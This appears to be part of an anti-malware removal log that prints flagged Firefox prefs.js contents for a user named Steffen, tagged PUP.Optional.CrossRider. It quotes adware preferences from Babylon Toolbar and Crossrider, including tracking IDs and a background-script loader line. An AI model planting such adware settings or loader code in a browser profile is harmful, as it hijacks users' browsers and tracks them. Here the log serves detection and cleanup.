user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.introduced.pocket-button&quot;, true);
user_pref(&quot;browser.uiCustomization.state&quot;, &quot;{\&quot;placements\&quot;:{\&quot;PanelUI-contents\&quot;:[\&quot;edit-controls\&quot;,\&quot;zoom-controls\&quot;,\&quot;new-window-button\&quot;,\&quot;privatebrowsing-button\&quot;,\&quot;save-page-button\&quot;,\&quot;print-button\&quot;,\&quot;history-panelmenu\&quot;,\&quot;fullscreen-button\&quot;,\&quot;find-button\&quot;,\&quot;add-ons-button\&quot;,\&quot;developer-button\&quot;,\&quot;preferences-button\&quot;],\&quot;addon-bar\&quot;:[\&quot;addonbar-closebutton\&quot;,\&quot;customizableui-special-spring1\&quot;,\&quot;status-bar\&quot;],\&quot;PersonalToolbar\&quot;:[\&quot;personal-bookmarks\&quot;],\&quot;nav-bar\&quot;:[\&quot;unified-back-forward-button\&quot;,\&quot;urlbar-container\&quot;,\&quot;reload-button\&quot;,\&quot;stop-button\&quot;,\&quot;search-container\&quot;,\&quot;webrtc-status-button\&quot;,\&quot;bookmarks-menu-button\&quot;,\&quot;pocket-button\&quot;,\&quot;downloads-button\&quot;,\&quot;home-button\&quot;,\&quot;window-controls\&quot;,\&quot;social-share-button\&quot;,\&quot;loop-button-throttled\&quot;,\&quot;loop-button\&quot;],\&quot;TabsToolbar\&quot;:[\&quot;tabbrowser-tabs\&quot;,\&quot;new-tab-button\&quot;,\&quot;alltabs-button\&quot;,\&quot;tabs-closebutton\&quot;],\&quot;toolbar-menubar\&quot;:[\&quot;menubar-items\&quot;]},\&quot;seen\&quot;:[],\&quot;dirtyAreaCache\&quot;:[\&quot;addon-bar\&quot;,\&quot;PersonalToolbar\&quot;,\&quot;nav-bar\&quot;,\&quot;TabsToolbar\&quot;,\&quot;toolbar-menubar\&quot;,\&quot;PanelUI-contents\&quot;],\&quot;currentVersion\&quot;:4,\&quot;newElementCount\&quot;:1}&quot;);
user_pref(&quot;browser.uitour.whitelist.add.260&quot;, &quot;&quot;);
user_pref(&quot;browser.uitour.whitelist.add.340&quot;, &quot;&quot;);
user_pref(&quot;browser.urlbar.autocomplete.enabled&quot;, false);
user_pref(&quot;browser.urlbar.suggest.bookmark&quot;, false);
user_pref(&quot;browser.urlbar.suggest.history&quot;, false);
user_pref(&quot;browser.urlbar.suggest.openpage&quot;, false);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionFailureTime&quot;, &quot;1435040802954&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionRequestedTime&quot;, &quot;1449324463516&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionSuccessfulTime&quot;, &quot;1449324465597&quot;);
user_pref(&quot;datareporting.healthreport.nextDataSubmissionTime&quot;, &quot;1449410865597&quot;);
user_pref(&quot;datareporting.healthreport.service.firstRun&quot;, true);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyAcceptedVersion&quot;, 2);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyNotifiedTime&quot;, &quot;1417596264603&quot;);
user_pref(&quot;datareporting.policy.firstRunTime&quot;, &quot;1365871572512&quot;);
user_pref(&quot;datareporting.sessions.current.activeTicks&quot;, 7);
user_pref(&quot;datareporting.sessions.current.firstPaint&quot;, 26881);
user_pref(&quot;datareporting.sessions.current.main&quot;, 17238);
user_pref(&quot;datareporting.sessions.current.sessionRestored&quot;, 28445);
user_pref(&quot;datareporting.sessions.current.startTime&quot;, &quot;1449386316097&quot;);
user_pref(&quot;datareporting.sessions.current.totalTime&quot;, 56);
user_pref(&quot;datareporting.sessions.currentIndex&quot;, 2040);
user_pref(&quot;datareporting.sessions.previous.2039&quot;, &quot;{\&quot;s\&quot;:1449305208258,\&quot;a\&quot;:5540,\&quot;t\&quot;:48663,\&quot;c\&quot;:true,\&quot;m\&quot;:124,\&quot;fp\&quot;:1248,\&quot;sr\&quot;:1446}&quot;);
user_pref(&quot;datareporting.sessions.prunedIndex&quot;, 2038);
user_pref(&quot;devtools.telemetry.tools.opened.version&quot;, &quot;{\&quot;DEVTOOLS_TOOLBOX_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_INSPECTOR_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_RULEVIEW_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;}&quot;);
user_pref(&quot;devtools.toolbox.selectedTool&quot;, &quot;inspector&quot;);
user_pref(&quot;devtools.toolsidebar-width.inspector&quot;, 0);
user_pref(&quot;dom.apps.reset-permissions&quot;, true);
user_pref(&quot;dom.disable_open_during_load&quot;, false);
user_pref(&quot;dom.mozApps.used&quot;, true);
user_pref(&quot;dom.w3c_touch_events.expose&quot;, false);
user_pref(&quot;experiments.activeExperiment&quot;, false);
user_pref(&quot;extensions.BabylonToolbar_i.aflt&quot;, &quot;babsst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babExt&quot;, &quot;&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babTrack&quot;, &quot;affID=110819&amp;tt=010712_3&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.hardId&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.id&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlDay&quot;, &quot;15525&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlRef&quot;, &quot;sst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.prdct&quot;, &quot;BabylonToolbar&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.prtnrId&quot;, &quot;babylon&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.smplGrp&quot;, &quot;none&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.srcExt&quot;, &quot;ss&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.tlbrId&quot;, &quot;tb9&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsn&quot;, &quot;1.5.3.17&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsnTs&quot;, &quot;1.5.3.1715:08:45&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsni&quot;, &quot;1.5.3.17&quot;);
user_pref(&quot;extensions.blocklist.pingCountTotal&quot;, 1064);
user_pref(&quot;extensions.blocklist.pingCountVersion&quot;, 20);
user_pref(&quot;extensions.bootstrappedAddons&quot;, &quot;{}&quot;);
user_pref(&quot;extensions.crossrider.bic&quot;, &quot;139c5ccd042fc6d366e9efe2a8a22d88&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationThankYouPage&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationTime&quot;, 1347643228);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.searchUserConifrmation&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setHomepage&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setNewTab&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setSearch&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.active&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.addressbar&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.backgroundjs&quot;, &quot;\n\n\&quot;undefined\&quot;!=typeof _GPL_BG_NEW&amp;&amp;appAPI.webRequest&amp;&amp;appAPI.webRequest.onBeforeNavigate?_GPL_BG_NEW.preinit():\&quot;undefined\&quot;!=typeof _GPL_BG&amp;&amp;appAPI.onRequest&amp;&amp;_GPL_BG.preinit();\n&quot;);</baddata><gooddata></gooddata><hash>9c3d287974171a1ce7dca7f329db2bd5</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>\&quot;undefined\&quot;!=typeof _GPL_BG&amp;&amp;appAPI.onRequest&amp;&amp;_GPL_BG.preinit();\n&quot;);
user_pref(&quot;exte</baddata><gooddata></gooddata><hash>eeeb6a3785066ec85f64fc9e09fbc53b</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.introduced.pocket-button&quot;, true);
user_pref(&quot;browser.uiCustomization.state&quot;, &quot;{\&quot;placements\&quot;:{\&quot;PanelUI-contents\&quot;:[\&quot;edit-controls\&quot;,\&quot;zoom-controls\&quot;,\&quot;new-window-button\&quot;,\&quot;privatebrowsing-button\&quot;,\&quot;save-page-button\&quot;,\&quot;print-button\&quot;,\&quot;history-panelmenu\&quot;,\&quot;fullscreen-button\&quot;,\&quot;find-button\&quot;,\&quot;add-ons-button\&quot;,\&quot;developer-button\&quot;,\&quot;preferences-button\&quot;],\&quot;addon-bar\&quot;:[\&quot;addonbar-closebutton\&quot;,\&quot;customizableui-special-spring1\&quot;,\&quot;status-bar\&quot;],\&quot;PersonalToolbar\&quot;:[\&quot;personal-bookmarks\&quot;],\&quot;nav-bar\&quot;:[\&quot;unified-back-forward-button\&quot;,\&quot;urlbar-container\&quot;,\&quot;reload-button\&quot;,\&quot;stop-button\&quot;,\&quot;search-container\&quot;,\&quot;webrtc-status-button\&quot;,\&quot;bookmarks-menu-button\&quot;,\&quot;pocket-button\&quot;,\&quot;downloads-button\&quot;,\&quot;home-button\&quot;,\&quot;window-controls\&quot;,\&quot;social-share-button\&quot;,\&quot;loop-button-throttled\&quot;,\&quot;loop-button\&quot;],\&quot;TabsToolbar\&quot;:[\&quot;tabbrowser-tabs\&quot;,\&quot;new-tab-button\&quot;,\&quot;alltabs-button\&quot;,\&quot;tabs-closebutton\&quot;],\&quot;toolbar-menubar\&quot;:[\&quot;menubar-items\&quot;]},\&quot;seen\&quot;:[],\&quot;dirtyAreaCache\&quot;:[\&quot;addon-bar\&quot;,\&quot;PersonalToolbar\&quot;,\&quot;nav-bar\&quot;,\&quot;TabsToolbar\&quot;,\&quot;toolbar-menubar\&quot;,\&quot;PanelUI-contents\&quot;],\&quot;currentVersion\&quot;:4,\&quot;newElementCount\&quot;:1}&quot;);
user_pref(&quot;browser.uitour.whitelist.add.260&quot;, &quot;&quot;);
user_pref(&quot;browser.uitour.whitelist.add.340&quot;, &quot;&quot;);
user_pref(&quot;browser.urlbar.autocomplete.enabled&quot;, false);
user_pref(&quot;browser.urlbar.suggest.bookmark&quot;, false);
user_pref(&quot;browser.urlbar.suggest.history&quot;, false);
user_pref(&quot;browser.urlbar.suggest.openpage&quot;, false);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionFailureTime&quot;, &quot;1435040802954&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionRequestedTime&quot;, &quot;1449324463516&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionSuccessfulTime&quot;, &quot;1449324465597&quot;);
user_pref(&quot;datareporting.healthreport.nextDataSubmissionTime&quot;, &quot;1449410865597&quot;);
user_pref(&quot;datareporting.healthreport.service.firstRun&quot;, true);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyAcceptedVersion&quot;, 2);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyNotifiedTime&quot;, &quot;1417596264603&quot;);
user_pref(&quot;datareporting.policy.firstRunTime&quot;, &quot;1365871572512&quot;);
user_pref(&quot;datareporting.sessions.current.activeTicks&quot;, 7);
user_pref(&quot;datareporting.sessions.current.firstPaint&quot;, 26881);
user_pref(&quot;datareporting.sessions.current.main&quot;, 17238);
user_pref(&quot;datareporting.sessions.current.sessionRestored&quot;, 28445);
user_pref(&quot;datareporting.sessions.current.startTime&quot;, &quot;1449386316097&quot;);
user_pref(&quot;datareporting.sessions.current.totalTime&quot;, 56);
user_pref(&quot;datareporting.sessions.currentIndex&quot;, 2040);
user_pref(&quot;datareporting.sessions.previous.2039&quot;, &quot;{\&quot;s\&quot;:1449305208258,\&quot;a\&quot;:5540,\&quot;t\&quot;:48663,\&quot;c\&quot;:true,\&quot;m\&quot;:124,\&quot;fp\&quot;:1248,\&quot;sr\&quot;:1446}&quot;);
user_pref(&quot;datareporting.sessions.prunedIndex&quot;, 2038);
user_pref(&quot;devtools.telemetry.tools.opened.version&quot;, &quot;{\&quot;DEVTOOLS_TOOLBOX_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_INSPECTOR_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_RULEVIEW_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;}&quot;);
user_pref(&quot;devtools.toolbox.selectedTool&quot;, &quot;inspector&quot;);
user_pref(&quot;devtools.toolsidebar-width.inspector&quot;, 0);
user_pref(&quot;dom.apps.reset-permissions&quot;, true);
user_pref(&quot;dom.disable_open_during_load&quot;, false);
user_pref(&quot;dom.mozApps.used&quot;, true);
user_pref(&quot;dom.w3c_touch_events.expose&quot;, false);
user_pref(&quot;experiments.activeExperiment&quot;, false);
user_pref(&quot;extensions.BabylonToolbar_i.aflt&quot;, &quot;babsst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babExt&quot;, &quot;&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babTrack&quot;, &quot;affID=110819&amp;tt=010712_3&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.hardId&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.id&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlDay&quot;, &quot;15525&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlRef&quot;, &quot;sst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.prdct&quot;, &quot;BabylonToolbar&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.prtnrId&quot;, &quot;babylon&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.smplGrp&quot;, &quot;none&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.srcExt&quot;, &quot;ss&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.tlbrId&quot;, &quot;tb9&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsn&quot;, &quot;1.5.3.17&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsnTs&quot;, &quot;1.5.3.1715:08:45&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsni&quot;, &quot;1.5.3.17&quot;);
user_pref(&quot;extensions.blocklist.pingCountTotal&quot;, 1064);
user_pref(&quot;extensions.blocklist.pingCountVersion&quot;, 20);
user_pref(&quot;extensions.bootstrappedAddons&quot;, &quot;{}&quot;);
user_pref(&quot;extensions.crossrider.bic&quot;, &quot;139c5ccd042fc6d366e9efe2a8a22d88&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationThankYouPage&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationTime&quot;, 1347643228);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.searchUserConifrmation&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setHomepage&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setNewTab&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setSearch&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.active&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.addressbar&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.backgroundjs&quot;, &quot;\n\n\&quot;undefined\&quot;!=typeof _GPL_BG_NEW&amp;&amp;appAPI.webRequest&amp;&amp;appAPI.webRequest.onBeforeNavigate?_GPL_BG_NEW.preinit():\&quot;undefined\&quot;!=typeof _GPL_BG&amp;&amp;appAPI.onRequest&amp;&amp;_GPL_BG.preinit();\n&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.backgroundver&quot;, 7);
user_pref(&quot;extensions.crossriderapp5060.5060.can_run_bg_code&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.certdomaininstaller&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.changeprevious&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallationTime.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallationTime.value&quot;, &quot;1347643228&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallerParams.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_aoi.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_aoi.value&quot;, &quot;1347643228&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_blocklist.expiration&quot;, &quot;Fri Nov 30 2012 17:31:43 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_blocklist.value&quot;, &quot;%22nonexistantdomain.com%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_country_code.expiration&quot;, &quot;Sun Dec 02 2012 14:58:35 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_country_code.value&quot;, &quot;%22DE%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_crr.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_crr.value&quot;, &quot;1354292451&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_hotfix20111102645.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_hotfix20111102645.value&quot;, &quot;%221%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_installer_params.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_installer_params.value&quot;, &quot;%7B%22source_id%22%3A%220%22%2C%22sub_id%22%3A%220%22%2C%22uzid%22%3A%220%22%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_parent_zoneid.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_parent_zoneid.value&quot;, &quot;%2214019%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_pc_20120828.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_pc_20120828.value&quot;, &quot;1347643324716&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_product_id.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_product_id.value&quot;, &quot;%221224%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_zoneid.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_zoneid.value&quot;, &quot;%2282063%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.dbtest.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.dbtest.value&quot;, &quot;1347643311989&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.description&quot;, &quot;Savings Sidekick&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.domain&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.enablesearch&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.fbremoteurl&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.group&quot;, 0);
user_pref(&quot;extensions.crossriderapp5060.5060.homepage&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.iframe&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.InstallerIdentifiers.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.InstallerIdentifiers.value&quot;, &quot;%7B%22installer_bic%22%3A%22B2F0E20977AD4C33ABC24800D8090F46IE%22%2C%22installer_verifier%22%3A%22a4b03d63b8bf5d68245e569a6d0f510a%22%2C%22installer_verifier_for_215app%22%3A%222456002ffb0c784079745e982e7370a8%22%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_appVer.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_appVer.value&quot;, &quot;38&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_lastVersion.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_lastVersion.value&quot;, &quot;0&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_meta.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_meta.value&quot;, &quot;%7B%7D&quot;);
